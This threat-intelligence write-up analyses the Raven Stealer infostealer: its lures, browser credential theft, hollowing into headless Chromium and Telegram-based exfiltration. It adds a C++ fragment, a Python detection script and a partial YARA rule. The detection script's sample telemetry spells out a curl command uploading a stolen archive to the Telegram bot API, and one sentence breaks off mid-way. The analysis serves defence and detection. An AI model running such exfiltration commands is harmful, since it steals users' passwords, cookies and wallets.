The commodity infostealer landscape has a new entrant in Raven Stealer, a compact Delphi/C++ binary that abuses Telegram's bot API to exfiltrate victims' browser secrets.
First seen in mid-July 2025 on a GitHub repository operated by the self-styled ZeroTrace Crew, Raven arrives either packed as a UPX-compressed executable or bundled inside renamed attachments such as "bill.3mf.exe".
Once executed, the payload runs headlessly, never presenting a console window, and immediately prepares the ground for covert exfiltration.
Attack chains observed in the wild rely on convincing social-engineering lures that funnel targets to GitHub releases or direct Telegram messages containing the builder's output.
Within seconds of execution, the stub enumerates installed Chromium-based browsers, decrypts saved passwords and cookies, and scoops cryptocurrency wallets and autofill data into a tidy folder hierarchy.
Cyfirma analysts noted the stealer's disciplined directory structure (%Local%\RavenStealer\Chrome, Edge, and Crypto Wallets), which simplifies post-infection triage for threat actors.
The ramifications are severe: a single infection yields domain credentials, payment card details, and persistent session cookies that bypass MFA.
Compounding the threat, exfiltration leverages Telegram's /sendDocument endpoint, allowing operators to receive ZIP archives over an encrypted channel that most corporate firewalls permit by default.
Raven Stealer (Source – Cyfirma)
This dashboard shows Raven's resulting archive, whose filename embeds the victim's username for easy cataloguing.
Infection Mechanism: Reflective Process Hollowing inside Chromium
Raven's most striking trick lies in its in-memory DLL injection chain. After unpacking itself (entropy >7 confirms UPX), the dropper decrypts an embedded DLL stored under resource ID 101 and harvests the Telegram bot_token and chat_id from resources 102 and 103.
Extracting Bot Token and ChatID (Source – Cyfirma)
It then spawns chrome.exe in a suspended state with --headless --disable-gpu --no-sandbox, allocates memory via NtAllocateVirtualMemory, and maps the DLL into the new process, bypassing user-land hooks and hiding behind the browser's legitimate signature.
A fragment of the resource-extraction routine illustrates Raven's low-level style:
HRSRC hRes = FindResourceW(NULL, MAKEINTRESOURCE(102), RT_RCDATA); // resource 102 = bot_token
DWORD sz = SizeofResource(NULL, hRes);                               // size of the raw resource bytes
BYTE* pBuf = (BYTE*)LockResource(LoadResource(NULL, hRes));          // map the resource into memory
// pBuf now holds the Telegram bot token in plain text
Once collection finishes, PowerShell compresses %Local%\RavenStealer into %TEMP%_RavenStealer.zip, and curl.exe pushes the file to
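The chain described above (a non-browser parent launching a headless, sandbox-less Chromium, followed by curl.exe posting an archive to the Telegram bot API) is visible in process-creation telemetry. The following detection logic is an added example, not Cyfirma's rule or the malware's code; it assumes Sysmon Event ID 1 field names (Image, ParentImage, CommandLine) and runs over constructed sample events, with the parent allowlist being an assumption to tune per environment.

```python
# Added example (not from Cyfirma or the page): process-telemetry checks for the
# Raven Stealer chain, run over constructed Sysmon-style Event ID 1 records.
BROWSER_HOSTS = {"chrome.exe", "msedge.exe"}            # Chromium hosts Raven injects into
HOLLOWING_FLAGS = ("--headless", "--disable-gpu", "--no-sandbox")
LOW_RISK_PARENTS = BROWSER_HOSTS | {"explorer.exe"}      # assumption: tune per environment

def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(ev: dict) -> list[str]:
    """Return a list of findings for one process-creation event (empty if benign)."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev["CommandLine"].lower()
    findings = []
    # 1. A headless, GPU-less, sandbox-less Chromium started by a non-browser parent
    #    matches the suspended hollowing host that Raven creates.
    if image in BROWSER_HOSTS and all(f in cmd for f in HOLLOWING_FLAGS) \
            and parent not in LOW_RISK_PARENTS:
        findings.append(f"headless {image} spawned by {parent}: possible hollowing host")
    # 2. curl.exe uploading a document to the Telegram bot API is the exfiltration step.
    if image == "curl.exe" and "api.telegram.org" in cmd and "/senddocument" in cmd:
        findings.append("curl.exe POST to Telegram /sendDocument: possible exfiltration")
    # 3. Any command line touching the stealer's staging folder or archive name.
    if "ravenstealer" in cmd:
        findings.append("command line references RavenStealer staging artefact")
    return findings

def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Apply check_event to every event; returns (event index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in check_event(ev)]

# Constructed sample telemetry (not real logs); <token> is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\alice\Downloads\bill.3mf.exe",
     "CommandLine": "chrome.exe --headless --disable-gpu --no-sandbox"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"chrome.exe" --profile-directory=Default'},
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Users\alice\Downloads\bill.3mf.exe",
     "CommandLine": r'curl.exe -F "document=@C:\Users\alice\AppData\Local\Temp\_RavenStealer.zip" '
                    r"https://api.telegram.org/bot<token>/sendDocument"},
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Legitimate headless automation (for example a test runner driving Chrome) will also trip the first check, so extend LOW_RISK_PARENTS with the parents your environment expects rather than dropping the rule.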
A minimal YARA rule released by Cyfirma pinpoints the threat by matching strings such as "passwords.txt" and "api.telegram.org", and the SHA-256 hash 28d6fbbd…55 embedded in older builds:
$s1 = "api.telegram.org" nocase
$s2 = "%Local%\\RavenStealer\\Chrome" nocase
$s3 = "passwords.txt" nocase
condition: 3 of ($s*)
By intertwining stealth packing, syscall-level injection, and Telegram C2, Raven Stealer underscores how little expertise is now required to mount high-yield credential-theft campaigns.